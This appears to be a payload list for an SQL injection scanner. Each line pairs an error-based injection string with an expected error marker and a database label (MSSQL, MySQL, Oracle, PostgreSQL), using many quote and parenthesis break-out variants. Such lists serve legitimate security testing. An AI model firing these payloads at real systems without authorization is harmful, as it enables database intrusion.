﻿ and (select @@version)=1--：Microsoft SQL Server：SQLServer错误显示注入：SQLServer： (select @@version)=1
 or (select @@version)=1--：Microsoft SQL Server：SQLServer错误显示注入：SQLServer： (select @@version)=1
' and (select @@version)=1--：Microsoft SQL Server：SQLServer错误显示注入：SQLServer： (select @@version)=1
%' or (select @@version)=1--：Microsoft SQL Server：SQLServer错误显示注入：SQLServer： (select @@version)=1
%' and (select @@version)=1--：Microsoft SQL Server：SQLServer错误显示注入：SQLServer： (select @@version)=1
 or (select @@version)=1：Microsoft SQL Server：SQLServer错误显示注入：SQLServer： (select @@version)=1
 and (select @@version)=1：Microsoft SQL Server：SQLServer错误显示注入：SQLServer： (select @@version)=1
) or (select @@version)=1 and (1=1：Microsoft SQL Server：SQLServer错误显示注入：SQLServer： (select @@version)=1
) and (select @@version)=1 and (1=1：Microsoft SQL Server：SQLServer错误显示注入：SQLServer： (select @@version)=1
' or (select @@version)=1 and 'a'='a：Microsoft SQL Server：SQLServer错误显示注入：SQLServer： (select @@version)=1
' or (select @@version)=1 or 'a'='a：Microsoft SQL Server：SQLServer错误显示注入：SQLServer： (select @@version)=1
' and (select @@version)=1 and 'a'='a：Microsoft SQL Server：SQLServer错误显示注入：SQLServer： (select @@version)=1
%' and (select @@version)=1 and '%'='：Microsoft SQL Server：SQLServer错误显示注入：SQLServer： (select @@version)=1
') or (select @@version)=1 and ('a'='a：Microsoft SQL Server：SQLServer错误显示注入：SQLServer： (select @@version)=1
%' or (select @@version)=1 and '%'='：Microsoft SQL Server：SQLServer错误显示注入：SQLServer： (select @@version)=1
 or (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)#：injecttest：MySQL错误显示注入：MySQL： (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)
 and (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)#：injecttest：MySQL错误显示注入：MySQL： (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)
) or (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a) and (1=1：injecttest：MySQL错误显示注入：MySQL： (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)
) and (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a) and (1=1：injecttest：MySQL错误显示注入：MySQL： (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)
' or (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)#：injecttest：MySQL错误显示注入：MySQL： (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)
' and (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)#：injecttest：MySQL错误显示注入：MySQL： (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)
%d5' or (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)#：injecttest：MySQL错误显示注入：MySQL： (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)
') or (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)#：injecttest：MySQL错误显示注入：MySQL： (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)
') and (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)#：injecttest：MySQL错误显示注入：MySQL： (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)
%' or (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)#：injecttest：MySQL错误显示注入：MySQL： (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)
%' and (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)#：injecttest：MySQL错误显示注入：MySQL： (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)
%') or (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)#：injecttest：MySQL错误显示注入：MySQL： (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)
%') and (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)#：injecttest：MySQL错误显示注入：MySQL： (select 1 from (select count(*),concat(0x696E6A65637474657374,floor(rand(0)*2))x from information_schema.tables group by x)a)
 or 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual)：696E6A65637474657374：Oracle错误显示注入：Oracle： 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual)
 and 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual)--：696E6A65637474657374：Oracle错误显示注入：Oracle： 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual)
) or 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual) and (1=1：696E6A65637474657374：Oracle错误显示注入：Oracle： 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual)
) and 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual) and (1=1：696E6A65637474657374：Oracle错误显示注入：Oracle： 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual)
' or 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual) and 'a'='a：696E6A65637474657374：Oracle错误显示注入：Oracle： 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual)
' and 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual) and 'a'='a：696E6A65637474657374：Oracle错误显示注入：Oracle： 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual)
' or 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual)--：696E6A65637474657374：Oracle错误显示注入：Oracle： 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual)
' and 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual)--：696E6A65637474657374：Oracle错误显示注入：Oracle： 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual)
') or 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual) and ('a'='a：696E6A65637474657374：Oracle错误显示注入：Oracle： 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual)
') and 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual) and ('a'='a：696E6A65637474657374：Oracle错误显示注入：Oracle： 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual)
%' or 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual) and '%'='：696E6A65637474657374：Oracle错误显示注入：Oracle： 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual)
%') or 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual)--：696E6A65637474657374：Oracle错误显示注入：Oracle： 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual)
%') and 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual)--：696E6A65637474657374：Oracle错误显示注入：Oracle： 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex('injecttest'))) from dual)
 and 1=cast((chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(116)||chr(101)||chr(115)||chr(116)) as numeric)--：injecttest：PostgreSQL错误显示注入：PostgreSQL： 1=cast((chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(116)||chr(101)||chr(115)||chr(116)) as numeric)
 or 1=cast((chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(116)||chr(101)||chr(115)||chr(116)) as numeric)--：injecttest：PostgreSQL错误显示注入：PostgreSQL： 1=cast((chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(116)||chr(101)||chr(115)||chr(116)) as numeric)
 ' and 1=cast((chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(116)||chr(101)||chr(115)||chr(116)) as numeric)--：injecttest：PostgreSQL错误显示注入：PostgreSQL： 1=cast((chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(116)||chr(101)||chr(115)||chr(116)) as numeric)
 or 1=cast((chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(116)||chr(101)||chr(115)||chr(116)) as numeric)：injecttest：PostgreSQL错误显示注入：PostgreSQL： 1=cast((chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(116)||chr(101)||chr(115)||chr(116)) as numeric)
 and 1=cast((chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(116)||chr(101)||chr(115)||chr(116)) as numeric)：injecttest：PostgreSQL错误显示注入：PostgreSQL： 1=cast((chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(116)||chr(101)||chr(115)||chr(116)) as numeric)
) or 1=cast((chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(116)||chr(101)||chr(115)||chr(116)) as numeric) and (1=1：injecttest：PostgreSQL错误显示注入：PostgreSQL： 1=cast((chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(116)||chr(101)||chr(115)||chr(116)) as numeric)
) and 1=cast((chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(116)||chr(101)||chr(115)||chr(116)) as numeric) and (1=1：injecttest：PostgreSQL错误显示注入：PostgreSQL： 1=cast((chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(116)||chr(101)||chr(115)||chr(116)) as numeric)
' or 1=cast((chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(116)||chr(101)||chr(115)||chr(116)) as numeric) and 'a'='a：injecttest：PostgreSQL错误显示注入：PostgreSQL： 1=cast((chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(116)||chr(101)||chr(115)||chr(116)) as numeric)
' and 1=cast((chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(116)||chr(101)||chr(115)||chr(116)) as numeric) and 'a'='a：injecttest：PostgreSQL错误显示注入：PostgreSQL： 1=cast((chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(116)||chr(101)||chr(115)||chr(116)) as numeric)
%' and 1=cast((chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(116)||chr(101)||chr(115)||chr(116)) as numeric) and '%'='：injecttest：PostgreSQL错误显示注入：PostgreSQL： 1=cast((chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(116)||chr(101)||chr(115)||chr(116)) as numeric)
%' or 1=cast((chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(116)||chr(101)||chr(115)||chr(116)) as numeric)--：injecttest：PostgreSQL错误显示注入：PostgreSQL： 1=cast((chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(116)||chr(101)||chr(115)||chr(116)) as numeric)
%' and 1=cast((chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(116)||chr(101)||chr(115)||chr(116)) as numeric)--：injecttest：PostgreSQL错误显示注入：PostgreSQL： 1=cast((chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(116)||chr(101)||chr(115)||chr(116)) as numeric)
') or 1=cast((chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(116)||chr(101)||chr(115)||chr(116)) as numeric) and ('a'='a：injecttest：PostgreSQL错误显示注入：PostgreSQL： 1=cast((chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(116)||chr(101)||chr(115)||chr(116)) as numeric)
%' or 1=cast((chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(116)||chr(101)||chr(115)||chr(116)) as numeric) and '%'='：injecttest：PostgreSQL错误显示注入：PostgreSQL： 1=cast((chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(116)||chr(101)||chr(115)||chr(116)) as numeric)